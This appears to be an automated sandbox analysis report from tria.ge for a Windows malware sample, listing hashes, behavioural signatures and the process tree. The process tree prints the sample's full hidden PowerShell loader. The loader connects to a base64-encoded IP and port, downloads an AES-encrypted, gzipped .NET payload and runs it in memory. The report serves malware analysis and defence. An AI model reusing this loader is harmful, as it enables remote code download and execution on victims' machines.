Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
19/03/2024, 18:47
Static task
static1
Behavioral task
behavioral1
Sample
0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral2
Sample
0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe
Resource
win11-20240221-en
General
-
Target
0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe
-
Size
769KB
-
MD5
c6fea3621cca858371f2d596c9723891
-
SHA1
48a23b6c768a4a4f8ba2864159f959c0e025f08a
-
SHA256
0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3
-
SHA512
c3c7973b774c9cbe0888ebf4858b617a4431cb614a38d260ebefa3717ee932ccb0e93a14159aa6856aa0094e13627a1c8a071fdfff3639f5b14194af3a3d1bf4
-
SSDEEP
12288:9ZZYXK0z6bPETqd/a0hQ6o0No0mo09dCAMdCAHdCAwrH/cfwwGHCfu1eUgzpCGKD:9cXKp2b0y6fgli7vwPifu1d0yQ314
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 4344 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2332 1776 WerFault.exe 80 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 4344 powershell.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe Token: SeDebugPrivilege 4344 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1776 wrote to memory of 4344 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 81 PID 1776 wrote to memory of 4344 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 81 PID 1776 wrote to memory of 4344 1776 0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe 81
Processes
-
C:\Users\Admin\AppData\Local\Temp\0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe"C:\Users\Admin\AppData\Local\Temp\0a4d7ed03798e5257a21afc76553e538486316389bd54c9b9bcc03699ae21cd3.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 17762⤵
- Program crash
PID:2332
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1776 -ip 17761⤵PID:2664
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82